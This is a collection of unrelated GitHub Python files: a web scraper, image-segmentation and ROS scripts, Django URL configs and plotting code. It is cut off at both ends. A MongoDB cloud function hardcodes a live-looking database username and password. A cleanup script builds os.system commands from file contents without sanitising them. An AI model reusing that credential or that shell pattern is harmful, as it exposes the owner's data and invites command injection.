state_dic[state]\n\tfn = pattern.sub('', link) + '.html'\n\n\tif fn in dir_files and not overwrite:\n\t\tprint(\"Loading file: \" + fn)\n\t\twith open(data_dir + fn, 'r', encoding='utf-8') as f:\n\t\t\thtml = f.read()\n\telse:\n\t\tprint(\"Downloading: \" + fn)\n\t\tres = requests.get(link)\n\t\tif res.status_code:\n\t\t\thtml = res.text\n\t\t\thtml = html\n\t\t\twith open(data_dir+fn, 'w', encoding='utf-8') as f:\n\t\t\t\tf.write(html)\n\n\tcity_link = {}\n\n\tsoup = BeautifulSoup(html, 'lxml')\n\t\n\t# Sometimes websites redirect from the geo.craiglist.org page which lists cities\n\t# for the state to just the direct state page\n\ttry:\n\t\tcities = soup.find_all('ul', class_='geo-site-list')\n\t\tcities = cities[0].find_all('a', href=True)\n\t\tfor city in cities:\n\t\t\tc_name = city.text\n\t\t\tc_link = city['href']\n\t\t\t# Sometimes link adds slashes at end\n\t\t\tif c_link[-1] == '/':\n\t\t\t\tc_link = c_link[:-1]\n\t\t\t# Sometimes link has no http: in front\n\t\t\tif c_link[0] == '/':\n\t\t\t\tc_link = 'http:' + c_link[:-1]\n\t\t\tcity_link[c_name] = c_link\n\texcept:\n\t\tprint(\"Webpage for \" + state + \"redirected. Trying something else.\")\n\t\t# print(soup)\n\t\tcities = soup.find_all('li', class_='expand')\n\n\t\t# If there are no cities in state (https://micronesia.craigslist.org/)\n\t\tif len(cities) == 0:\n\t\t\treturn {}\n\n\t\tcities = cities[0].find_all('a', href=True)\n\t\tfor city in cities:\n\t\t\tc_name = city.text\n\t\t\tc_link = 'http:' + city['href']\n\t\t\t# Some links have extra slashes which will cause trouble\n\t\t\t# Sometimes link adds slashes at end\n\t\t\tif c_link[-1] == '/':\n\t\t\t\tc_link = c_link[:-1]\n\t\t\t# Sometimes link has no http: in front\n\t\t\tif c_link[0] == '/':\n\t\t\t\tc_link = 'http:' + c_link[:-1]\n\t\t\tcity_link[c_name] = c_link\n\n\treturn city_link\n\n# Lets put the links to each city, organized by state, into a json file\ndef dict_to_json(overwrite=False):\n\tstate_city_dict = {}\n\n\tstate_dict = link_state(overwrite=overwrite)\n\tfor state in state_dict:\n\t\tcities = link_city(state, state_dict, overwrite=overwrite)\n\t\tstate_city_dict[state] = cities\n\t\n\t# Delete problematic entries in dict\n\tdel state_city_dict['guam']\n\tdel state_city_dict['puerto rico']\n\tdel state_city_dict['hawaii']\n\n\twith open('state_city_dict.json', 'w', encoding='utf-8') as f:\n\t\tjson.dump(state_city_dict, f)\n\n# inspect links\ndef open_dict():\n\twith open('state_city_dict.json', 'r', encoding='utf-8') as f:\n\t\tdata = json.load(f)\n\t\tfor state in data:\n\t\t\tcities = data[state]\n\t\t\tfor city in cities:\n\t\t\t\tprint(cities[city])\n\n# dict_to_json(overwrite=False)\n# open_dict()","repo_name":"RedGeryon/PredictPrius","sub_path":"craigslist_links.py","file_name":"craigslist_links.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"39139890648","text":"import sys\nimport os\nimport skimage\nimport numpy as np\nfrom maskrcnn_utils import InferenceConfig\nfrom maskrcnn_utils import Dataset\nfrom mrcnn import model as modellib\nfrom cytomine.models import Job\nfrom biaflows import CLASS_OBJSEG\nfrom biaflows.helpers import BiaflowsJob, prepare_data, upload_data, upload_metrics\n\n\ndef main(argv):\n base_path = \"{}\".format(os.getenv(\"HOME\")) # Mandatory for Singularity\n problem_cls = CLASS_OBJSEG\n\n with BiaflowsJob.from_cli(argv) as bj:\n bj.job.update(status=Job.RUNNING, progress=0, statusComment=\"Initialisation...\")\n # 1. Prepare data for workflow\n in_imgs, gt_imgs, in_path, gt_path, out_path, tmp_path = prepare_data(problem_cls, bj, is_2d=True, **bj.flags)\n files = [image.filepath for image in in_imgs]\n\n # 2. Run Mask R-CNN prediction\n bj.job.update(progress=25, statusComment=\"Launching workflow...\")\n\n model_dir = \"/app\"\n dataset = Dataset()\n dataset.load_files(files)\n dataset.prepare()\n inference_config = InferenceConfig()\n model = modellib.MaskRCNN(mode = \"inference\",\n config = inference_config,\n model_dir = model_dir)\n model.load_weights(os.path.join(model_dir,'weights.h5'), by_name=True)\n\n for i,image_id in enumerate(dataset.image_ids):\n tiles = dataset.load_image(image_id, bj.parameters.nuclei_major_axis)\n tile_masks = []\n for image in tiles:\n mask = model.detect([image], verbose=0)[0]\n tile_masks.append(mask)\n\n mask_img = dataset.merge_tiles(image_id, tile_masks)\n skimage.io.imsave(os.path.join(out_path,os.path.basename(files[i])), mask_img)\n\n # 3. Upload data to BIAFLOWS\n upload_data(problem_cls, bj, in_imgs, out_path, **bj.flags, monitor_params={\n \"start\": 60, \"end\": 90, \"period\": 0.1,\n \"prefix\": \"Extracting and uploading polygons from masks\"})\n \n # 4. Compute and upload metrics\n bj.job.update(progress=90, statusComment=\"Computing and uploading metrics...\")\n upload_metrics(problem_cls, bj, in_imgs, gt_path, out_path, tmp_path, **bj.flags)\n\n # 5. Pipeline finished\n bj.job.update(progress=100, status=Job.TERMINATED, status_comment=\"Finished.\")\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"Neubias-WG5/W_NucleiSegmentation-MaskRCNN","sub_path":"wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"21191944434","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nfrom glob import glob\nfrom pprint import pprint\n\nmlist = []\nilist = glob('inputfiles/inp.*')\nfor inpf in ilist:\n with open(inpf, 'r') as f:\n for line in f:\n sline = line.split()\n if sline[0] == 'input_fitsimage' and sline[1].endswith('.tar.gz'):\n mlist.append(sline[1])\n else:\n pass\nprint('Models to be deleted:')\nif len(mlist) == 0:\n sys.exit('None.')\npprint(mlist)\nraw_input(\"Press Enter to continue...\")\nsymba_exec = 'singularity exec /cvmfs/singularity.opensciencegrid.org/mjanssen2308/symba:latest '\nfor mod in mlist:\n os.system('{0} irm {1} 2>/dev/null'.format(symba_exec, mod))\nprint('')\n","repo_name":"bhpire/symba-osg","sub_path":"cleanup-CyVerse.py","file_name":"cleanup-CyVerse.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"10458830890","text":"from pymongo import MongoClient\nfrom bson.json_util import dumps\nfrom bson import ObjectId\n\n# Cloud function to get product details from mongo\n\n\ndef read_mongodb_products(request):\n client = MongoClient(\n \"mongodb+srv://michaeldb:5RAqimKx&LkG@advanceddevelopmentunit.ks4lp1l.mongodb.net/?retryWrites=true&w=majority\")\n\n print(\"Connection successful to MongoDB version: \" +\n client.server_info()['version'])\n\n db = client['GameStore']['Products']\n\n print(\"Connection successful to collection\")\n\n myCursor = None\n\n try:\n id = request.args['id']\n except:\n id = False\n\n if id: # Return a particular product\n myquery = {\"_id\": ObjectId(id)}\n myCursor = db.find_one(myquery)\n json_data = dumps(myCursor)\n return json_data\n else: # Return all products\n myCursor = db.find()\n list_items = list(myCursor)\n json_data = dumps(list_items)\n return json_data\n\n","repo_name":"Tiger-Catori/Google-Cloud-Computing-Project","sub_path":"Project/cloudfunctions/read_mongodb_products/read_mongodb_products.py","file_name":"read_mongodb_products.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"27558674001","text":"#!/usr/bin/env python\n\n# This script allows to use a second camera, detached from the robot.\n# Since it is quite tricky to set up a multi-realsense setup, we first\n# acquire the pose of a markerboard in front of the robot and then ask the user\n# to hot-swap the cameras (i.e. unplug the first one and connect the second one).\n# This, however, requires the user to disable any static transform broadcaster\n# between the robot frames and the camera frame, otherwise there will be\n\nimport rospy\n\nimport tf\nfrom tf import transformations\nimport numpy as np\n\nBOARD_FRAME_NAME = \"aruco_board\"\nROOT_FRAME_NAME = \"panda_link0\"\nCAMERA_FRAME_NAME = \"camera_link\"\n\nif __name__ == \"__main__\":\n\n rospy.init_node(\"camera_locator\")\n\n # Configure TF transform listener and broadcaster\n tf_listener = tf.TransformListener(True, rospy.Duration(10))\n tf_broadcaster = tf.TransformBroadcaster()\n\n root_to_board_matrix = None\n camera_to_board_matrix = None\n\n rospy.loginfo(\"Listening for transfom from {} to {}...\".format(ROOT_FRAME_NAME, BOARD_FRAME_NAME))\n\n rate = rospy.Rate(10)\n\n while not rospy.is_shutdown():\n try:\n (translation, rotation) = tf_listener.lookupTransform(ROOT_FRAME_NAME, BOARD_FRAME_NAME, rospy.Time(0))\n root_to_board_matrix = np.dot(transformations.translation_matrix(translation), transformations.quaternion_matrix(rotation))\n break\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n continue\n\n raw_input(\"Plug in the new camera and press any key\")\n\n rospy.loginfo(\"Listening for transform from {} to {}...\".format(CAMERA_FRAME_NAME, BOARD_FRAME_NAME))\n\n while not rospy.is_shutdown():\n try:\n\n translation, rotation = tf_listener.lookupTransform(CAMERA_FRAME_NAME, BOARD_FRAME_NAME, rospy.Time(0))\n camera_to_board_matrix = np.dot(transformations.translation_matrix(translation), transformations.quaternion_matrix(rotation))\n root_to_camera_matrix = np.dot(root_to_board_matrix, np.linalg.inv(camera_to_board_matrix))\n\n translation = transformations.translation_from_matrix(root_to_camera_matrix)\n rotation = transformations.quaternion_about_axis(transformations.rotation_from_matrix(root_to_camera_matrix)[0], transformations.rotation_from_matrix(root_to_camera_matrix)[1])\n rospy.loginfo(\"Transform computed. Broadcasting transform...\")\n\n tf_broadcaster.sendTransform(translation,\n rotation,\n rospy.Time.now(),\n \"camera_link\",\n \"panda_link0\")\n\n rospy.sleep(0.1)\n\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n rospy.logerr(\"Error computing transform. Transform broadcasting offline\")\n rospy.sleep(rospy.Duration(1))\n continue\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"fbottarel/aruco_board_detect","sub_path":"aruco_board_detect/scripts/compute_camera_position.py","file_name":"compute_camera_position.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13335925950","text":"from django.conf import settings\nfrom django.conf.urls import patterns, include, url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.contrib import auth\nfrom django.views.generic import TemplateView\n\nurlpatterns = [\n # Examples:\n url(r'^$', 'newsletter.views.home', name='home'),\n url(r'^contact/$', 'newsletter.views.contact', name='contact'),\n url(r'^about/$', 'newsletter.views.about', name='about'),\n url(r'^team_profile/$', 'newsletter.views.team_profile', name='team_profile'),\n url(r'^timeline/$', 'newsletter.views.timeline', name='timeline'),\n url(r'^services/$', 'newsletter.views.services', name='services'),\n url(r'^pricing/$', 'newsletter.views.pricing', name='pricing'),\n url(r'^staff/$', 'newsletter.views.staff_home', name='staff'),\n url(r'^faq/$', 'newsletter.views.faq', name='faq'),\n url(r'^terms/$', 'newsletter.views.terms', name='terms'),\n url(r'^blog/$', 'newsletter.views.blog', name='blog'),\n url(r'^projects/$', 'newsletter.views.projects', name='projects'),\n url(r'^new_invoice/$', 'newsletter.views.new_invoice', name='new_invoice'),\n url(r'^paid_invoice/$', 'newsletter.views.paid_invoice', name='paid_invoice'),\n url(r'^unpaid_invoice/$', 'newsletter.views.unpaid_invoice', name='unpaid_invoice'),\n url(r'^checkout_shipping/$', 'newsletter.views.checkout_shipping', name='checkout_shipping'),\n url(r'^checkout_payment/$', 'newsletter.views.checkout_payment', name='checkout_payment'),\n url(r'^checkout_review/$', 'newsletter.views.checkout_review', name='checkout_review'),\n\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^accounts/', include('registration.backends.default.urls')),\n\n\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\nif settings.DEBUG:\n\turlpatterns == static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\turlpatterns == static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nurlpatterns += patterns('accounts.views',\n url(r'^register/$', 'register', name='register'),\n url(r'^sign_in/$', 'sign_in', name='sign_in'),\n url(r'^sign_out/$', 'sign_out', name='sign_out'),\n url(r'^user_account/$', 'user_account', name='user_account'),\n)\n\n\nurlpatterns += patterns('billing.views',\n url(r'^upgrade/$', 'upgrade', name='upgrade'),\n url(r'^billing/$', 'billing_history', name='billing_history'),\n url(r'^billing/cancel/$', 'cancel_subscription', name='cancel_subscription'),\n)\n\n\n","repo_name":"atorefrank/MakerSpace-Client","sub_path":"src/ulabs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40788225983","text":"#Oppgave 3a\r\ndef hastighet(fart):\r\n if fart <= 60:\r\n return \"fart: \" + str(fart)\r\n else:\r\n return \"fart: over 60.\"\r\n#Oppgave 3b\r\ndef sjekkVerdier(tallene,min,max):\r\n for tall in tallene:\r\n if tall >= max or tall <= min:\r\n return False\r\n return True\r\n#Oppgave 3 c\r\ndef hovedprogram():\r\n a = Node(\"a\")\r\n b = Node(\"b\")\r\n c = Node(\"c\")\r\n a.settInnHoyre(b)\r\n a.settInnVenstre(c)\r\n","repo_name":"ENBENC/Python","sub_path":"Eksamen 2017/oppgave3a.py","file_name":"oppgave3a.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13409726008","text":"from importlib import reload\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pfsPlotActor.utils.pfi as pfiUtils\n\nreload(pfiUtils)\n\n\nclass ConvergenceHist(pfiUtils.ConvergencePlot):\n\n def plot(self, convergeData, visitId=-1, vmin=0, vmax=30, bins=30, minIter=3):\n \"\"\"Plot the latest dataset.\"\"\"\n fig = self.fig\n ax = self.axes[0]\n cmap = plt.get_cmap('viridis')\n\n # Get chosen convergence default is current.\n convergeData = self.chosenConvergence(convergeData, visitId=visitId)\n if not len(convergeData):\n return\n\n [visitId] = convergeData.pfs_visit_id.unique()\n convergeData = convergeData.query(f'iteration>={minIter}')\n cmap = cmap(np.linspace(1.0, 0, len(convergeData.iteration.unique())))\n\n for i, (iterVal, iterData) in enumerate(convergeData.groupby('iteration')):\n dx = iterData.pfi_center_x_mm - iterData.pfi_target_x_mm\n dy = iterData.pfi_center_y_mm - iterData.pfi_target_y_mm\n dist = np.hypot(dx, dy)\n # converting to microns\n dist *= 1000\n\n n, bins, patches = ax.hist(dist, alpha=0.6, histtype='step', linewidth=3,\n label=f'{iterVal}-th Iteration', bins=bins, range=(vmin, vmax),\n color=cmap[i])\n\n ax.legend(loc='upper right')\n ax.set_title(f\"Distance to Target: pfsVisitId = {visitId:d}\")\n ax.set_xlabel(\"Distance (microns)\")\n ax.set_ylabel(\"N\")\n ax.set_aspect('auto')\n ax.grid()\n","repo_name":"Subaru-PFS/ics_pfsPlotActor","sub_path":"python/pfsPlotActor/plots/convergenceHist.py","file_name":"convergenceHist.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21513523073","text":"from json import dumps, JSONEncoder\nfrom typing import Any\nfrom pydantic import BaseModel\n\n\nclass BaseModelEncoder(JSONEncoder):\n def default(self, o):\n if isinstance(o, BaseModel):\n return o.dict()\n return super().default(o)\n\ndef convert_to_json(data: Any):\n if data is None or isinstance(data, (int, float)):\n return data\n return dumps(data, cls=BaseModelEncoder)","repo_name":"RCOS-IHP/IHP","sub_path":"backend/src/utils/conversions.py","file_name":"conversions.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"69894495131","text":"from django.urls import path\nfrom . import views\n# from .views import RegisterView,GetTokenView\nurlpatterns = [\n \n path('create pod /', views.creat_pod),\n path('getlistpod/', views.list_pods),\n path('create_deployment/', views.creat_deployment),\n path('getlistnode/', views.list_node),\n path('getlistnamespace/', views.list_namespace),\n path('deletenode/', views.delete_node),\n #path('getlistdeployment/', views.list_deployments),\n path('getlistservice/', views.list_service),\n path('deletepod/', views.delete_pod),\n path('createnode/', views.create_ndoe),\n path('getlistnamespace/', views.list_namespace),\n\n \n\n\n\n]","repo_name":"mohammadjavad2001/kubecli","sub_path":"cli/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1083013523","text":"file = open(\"aoc11_input.txt\")\nl = [[int(j == \"L\") for j in i] for i in file.read().split(\"\\n\")]\nfile.close()\n\nimport copy\n\ndef get_occupied_neighbors(l, x, y):\n c = 0\n for ix in range(-1, 2):\n if ix+x < 0 or ix+x > len(l[0])-1:\n continue\n for iy in range(-1, 2):\n if iy+y < 0 or iy+y > len(l)-1 or ix == iy == 0:\n continue\n c += int(l[iy+y][ix+x] == 2)\n \n return c\n\ndef print_seats(l):\n print(\"---\")\n seats = \".L#\"\n for i in l:\n print(''.join(seats[j] for j in i))\n\nchanges = 1\nwhile changes:\n print_seats(l)\n changes = 0\n n = copy.deepcopy(l)\n for iy in range(len(l)):\n for ix in range(len(l[0])):\n p = get_occupied_neighbors(l, ix, iy)\n if p >= 4 and l[iy][ix] == 2:\n n[iy][ix] = 1\n changes += 1\n if p == 0 and l[iy][ix] == 1:\n n[iy][ix] = 2\n changes += 1\n l = n\n\nprint(sum(i.count(2) for i in l))","repo_name":"TimHuisman1703/AdventOfCode","sub_path":"2020/Day 11/aoc11_1.py","file_name":"aoc11_1.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"6394708947","text":"from readFile import read_file\nfrom distance_counter import count_dist\nfrom greedy_nearest_neighbour import greedy_nearest_neighbour_propose\nfrom greedy_cycle import calculate_dist_of_given_cycle, greedy_cycle_propose\nfrom visualize import animate\nfrom connector import turns_connector, k_regret_connector\nimport numpy as np\n\n\ndef calculate_path_dist(history_cycles, distance_matrix):\n distance1 = calculate_dist_of_given_cycle(history_cycles[0], distance_matrix)\n distance2 = calculate_dist_of_given_cycle(history_cycles[1], distance_matrix)\n return distance1, distance2\n\n\nif __name__ == '__main__':\n data_set = 'kroB'\n overview, coordinates = read_file('data/' + data_set + '100.tsp')\n print(overview)\n distance_matrix = count_dist(coordinates)\n # resc, histc = greedy_cycle(distance_matrix, start_with=10)\n # resp, histp = greedy_nearest_neighbour(distance_matrix, start_with=10)\n\n\n results = []\n for x in range(100):\n history_gc, picked_nodes = turns_connector([greedy_cycle_propose,\n greedy_cycle_propose],\n distance_matrix)\n\n gc_dist_1, gc_dist_2 = calculate_path_dist(history_gc[-1], distance_matrix)\n results.append([gc_dist_1 + gc_dist_2, picked_nodes])\n # animate(history_gc, coordinates, cycle=[True, True])\n\n np_result = np.array(results, dtype=object)\n print(f'greedy_cycle minimum {np_result[:, 0].min(axis=0)} | maximum {np_result[:, 0].max(axis=0)} | mean {np_result[:, 0].mean(axis=0)}')\n np.savetxt('greedy_cycle-' + data_set + '.csv', np_result, delimiter=\",\", fmt=\"%s\")\n\n results = []\n for x in range(100):\n history_cycle, picked_nodes = k_regret_connector([greedy_cycle_propose,\n greedy_cycle_propose],\n distance_matrix, k=1)\n\n reg_gc_dist_1, reg_gc_dist_2 = calculate_path_dist(history_cycle[-1], distance_matrix)\n results.append([reg_gc_dist_1 + reg_gc_dist_2, picked_nodes])\n animate(history_cycle, coordinates, cycle=[True, True])\n\n np_result = np.array(results, dtype=object)\n print(f'k-regret greedy_cycle minimum {np_result[:, 0].min(axis=0)} | maximum {np_result[:, 0].max(axis=0)} | mean {np_result[:, 0].mean(axis=0)}')\n np.savetxt('regret_greedy_cycle-' + data_set + '.csv', np_result, delimiter=\",\", fmt=\"%s\")\n\n results = []\n for x in range(100):\n history_nn, picked_nodes = turns_connector([greedy_nearest_neighbour_propose,\n greedy_nearest_neighbour_propose],\n distance_matrix)\n\n nn_dist_1, nn_dist_2 = calculate_path_dist(history_nn[-1], distance_matrix)\n results.append([nn_dist_1 + nn_dist_2, picked_nodes])\n animate(history_nn, coordinates, cycle=[False, False])\n\n np_result = np.array(results, dtype=object)\n print(f'nearest neighbour minimum {np_result[:, 0].min(axis=0)} | maximum {np_result[:, 0].max(axis=0)} | mean {np_result[:, 0].mean(axis=0)}')\n np.savetxt('nn-' + data_set + '.csv', np_result, delimiter=\",\", fmt=\"%s\")\n","repo_name":"BlaiseCz/imo-lab","sub_path":"lab1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1506451706","text":"from __future__ import absolute_import, unicode_literals\nfrom textwrap import fill\nfrom zope.cachedescriptors.property import Lazy\nfrom zope.component import createObject\nfrom gs.core import comma_comma_and\nfrom gs.group.messages.topic.digest.base import TopicsDigestViewlet\nfrom .topicsdigest import DailyTopicsDigest\n\n\nclass DailyTopicsDigestViewlet(TopicsDigestViewlet):\n \"\"\" Viewlet used to pull data for daily topics digests. \"\"\"\n\n def __init__(self, context, request, view, manager):\n super(DailyTopicsDigestViewlet, self).__init__(context, request,\n view, manager)\n self.__topicsDigest__ = DailyTopicsDigest(self.context,\n self.siteInfo)\n\n @Lazy\n def people(self):\n userIds = set(self.topicsDigest.messageQuery.recent_authors(\n self.siteInfo.id, self.groupInfo.id, days=1))\n users = [createObject('groupserver.UserFromId', self.context,\n userId) for userId in userIds]\n retval = [u.name for u in users]\n return retval\n\n @Lazy\n def peopleText(self):\n retval = comma_comma_and(self.people)\n return retval\n\n\nclass DailyTopicsDigestViewletTxt(DailyTopicsDigestViewlet):\n def summary(self):\n if self.topicsDigest.post_stats['new_posts'] == 1:\n postStats = 'there has been a new post'\n else:\n s = 'there have been {0} new posts'\n postStats = s.format(self.topicsDigest.post_stats['new_posts'])\n\n newTopicStats = ''\n if self.topicsDigest.post_stats['new_topics'] == 1:\n newTopicStats = 'a new topic'\n elif self.topicsDigest.post_stats['new_topics'] >= 1:\n s = '{0} new topics'\n newTopicStats = s.format(\n self.topicsDigest.post_stats['new_topics'])\n\n existingTopicStats = ''\n if self.topicsDigest.post_stats['existing_topics'] == 1:\n existingTopicStats = 'an existing topic'\n elif self.topicsDigest.post_stats['existing_topics'] >= 1:\n s = '{0} existing topics'\n existingTopicStats = s.format(\n self.topicsDigest.post_stats['existing_topics'])\n\n if newTopicStats and existingTopicStats:\n topicStats = ' and '.join((newTopicStats, existingTopicStats))\n elif newTopicStats:\n topicStats = newTopicStats\n else:\n topicStats = existingTopicStats\n\n r = 'Since yesterday {0} made to {1} in {2}.'\n summary = r.format(postStats, topicStats, self.groupInfo.name)\n retval = fill(summary, 72)\n return retval\n","repo_name":"groupserver/gs.group.messages.topic.digest.daily","sub_path":"gs/group/messages/topic/digest/daily/viewlets.py","file_name":"viewlets.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70995540250","text":"import time\nfrom random import randint\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom .Utilities import Common_Utilities\n\nclass Form_Page_2_of_4:\n\n driver = None\n # logo_element = None\n wait = WebDriverWait(driver, 100)\n common_utility = Common_Utilities()\n email_element= None\n password_element = None\n domain_element = None\n\n def __init__(self):\n print(\"in Form_Page_2_of_4\")\n\n 'Get 2_of_4 element to check the current page'\n def get_2_of_4_element(self, driver):\n print(\"in get_2_of_4_element\")\n element_2_of_4 = self.common_utility.\\\n find_web_element(driver,\n By.XPATH,\n \"//div[contains(text(),'2 / 4')]\",\n \"2_of_4_element\",\n \"one\")\n return element_2_of_4\n\n 'Get \\'Upload link element\\', click it, abd select picture'\n def get_upload_element(self,driver):\n print(\"in get_upload_element\")\n upload_element = self.common_utility.\\\n find_web_element(driver,\n By.XPATH,\n \"//a[contains(text(),'upload')]\",\n \"upload_element\",\n \"one\")\n return upload_element\n\n def click_upload_element(self,driver):\n print(\"In click_upload_element\")\n result = self.common_utility.\\\n web_element_action(driver,\n self.get_upload_element(driver),\n \"click\",\"\",\"upload_element\")\n print(result)\n return result\n\n def upload_picture(self,driver):\n print(\"In upload_picture\")\n result_click_upload = self.click_upload_element(driver)\n time.sleep(2)\n result_upload_picture = self.common_utility.select_file_through_autoit()\n return result_upload_picture and result_click_upload\n\n\n 'Get Unselect all element, and click it'\n def get_uselect_all_element(self, driver):\n print(\"in get_uselect_all_element\")\n unselect_all_element = self.common_utility.\\\n find_web_element(driver,\n By.XPATH,\n \"//span[contains(text(),'Unselect all')]//parent::div/span/label/span\",\n \"unselect_all_element\", \"one\")\n return unselect_all_element\n\n def uncheck_unselect_all_element(self,driver):\n print(\"In uncheck_unselect_all_element\")\n result = self.common_utility.\\\n web_element_action(driver,\n self.get_uselect_all_element(driver),\n \"click\", \"\", \"unselect_all_element\")\n print(result)\n return result\n\n def get_all_checkboxes(self,driver):\n print(\" IN get_all_checkboxes\")\n all_checkbox_elememts = self.common_utility.\\\n find_web_element(driver,\n By.XPATH,\n \"//div[@class='avatar-and-interests__interests-list__item']\",\n \"all_checkbox_elements\", \"multiple\")\n return all_checkbox_elememts\n\n def select_3_valid_options(self,driver):\n print(\"In select_3_valid_options\")\n total_check_boxes = 21\n selected_options = []\n result =[]\n while len(selected_options) < 3 :\n #breakpoint()\n xpath_of_option_text = \"(//div[@class='avatar-and-interests__interests-list__item']/div/span[2])\"\n xpath_of_option_element = \"(//div[@class='avatar-and-interests__interests-list__item']/div/span/label/span)\"\n option_no = randint(1, total_check_boxes-1)\n if option_no in selected_options:\n continue\n xpath_of_option_text = xpath_of_option_text+\"[\"+str(option_no)+\"]\"\n xpath_of_option_element = xpath_of_option_element+\"[\"+str(option_no)+\"]\"\n print(xpath_of_option_text)\n random_option_element_for_text= self.common_utility.\\\n find_web_element(driver, By.XPATH, xpath_of_option_text,\n \"random_option_element\", \"one\")\n\n if random_option_element_for_text.text == \"Select all\" or\\\n random_option_element_for_text.text == \"Unselect all\":\n continue\n random_option_element = self.common_utility.\\\n find_web_element(driver,\n By.XPATH,\n xpath_of_option_element,\n \"random_option_element\", \"one\")\n result.append(self.common_utility.\n web_element_action(driver,\n random_option_element,\n \"click\", \"\",\n \"random_option_element\"))\n selected_options.append(option_no)\n print(result)\n for item in result:\n if item != True:\n return False\n\n return True\n\n 'Get Next button to goto page 3 of 4'\n def get_next_element(self, driver):\n print(\"in get_next_element\")\n next_element = self.common_utility.\\\n find_web_element(driver,\n By.XPATH,\n \"//button[contains(text(),'Next')]\",\n \"next_element\", \"one\")\n return next_element\n\n def click_next_element(self, driver):\n print(\"In click_next_element\")\n result = self.common_utility.\\\n web_element_action(driver,\n self.get_next_element(driver),\n \"click\", \"\", \"next_element\")\n print(result)\n return result\n\n\n\n\n","repo_name":"SpeedSourceLAB/Valiu_User_Inyerface_Challenge","sub_path":"Valiu_User_Inyerface_Challenge/features/Page_Objs/Form_Page_2.py","file_name":"Form_Page_2.py","file_ext":"py","file_size_in_byte":6290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14761512963","text":"from typing import Optional\n\nfrom dynaconf import Dynaconf, base\n\nsettings: Optional[base.LazySettings] = None\n\nsettings_file = \"./config/settings.toml\"\n\n\ndef config_init():\n global settings\n settings = Dynaconf(\n envvar_prefix=\"DYNACONF\",\n settings_files=[settings_file],\n )\n\n\nconfig_init()\n\n\n# `envvar_prefix` = export envvars with `export DYNACONF_FOO=bar`.\n# `settings_files` = Load these files in the order.\n","repo_name":"kuttakke/CUAVbot","sub_path":"config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"38111727096","text":"# views.py\nfrom django.shortcuts import render, redirect, HttpResponse, get_object_or_404\nfrom django.contrib import messages\nfrom django.core.mail import send_mail\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import loader\n\n# local files\nfrom .forms import UpdateUserForm, UpdateProfileForm\nfrom .models import CustomUser, UserProfile\n\n\ndef send_mail_to(request, *args, **kwargs):\n send_response_mail = send_mail(**kwargs)\n return send_response_mail\n\n\n@login_required(login_url='account_login')\ndef user_profile(request, *args):\n user_profile_data = UserProfile.objects.filter(userCreated=request.user).first()\n user_forms = UpdateUserForm(instance=request.user)\n profile_forms = UpdateProfileForm(instance=user_profile_data)\n context = {'user_profile_data': user_profile_data, 'user_data': user_forms, 'profile_form': profile_forms}\n return render(request, 'account/profile/edit_user_profile.html', context)\n\n\n# responsible for user edit algorithm\ndef edit_user_profile(request):\n user_profile_data = UserProfile.objects.filter(userCreated=request.user).first()\n if request.method == 'POST':\n # return HttpResponse('POSTed')\n user_forms = UpdateUserForm(request.POST, instance=request.user)\n profile_forms = UpdateProfileForm(request.POST, request.FILES, instance=user_profile_data)\n\n if user_forms.is_valid() and profile_forms.is_valid():\n user_forms.save() # saves user data\n profile_forms.save() # saves user profile data\n\n # add message\n messages.success(request, 'User Profile Updated Successfully!')\n\n # send mail\n # html message to the template\n html_message = loader.render_to_string('emails_temp/update_user_profile.html', context={\n 'first_name': 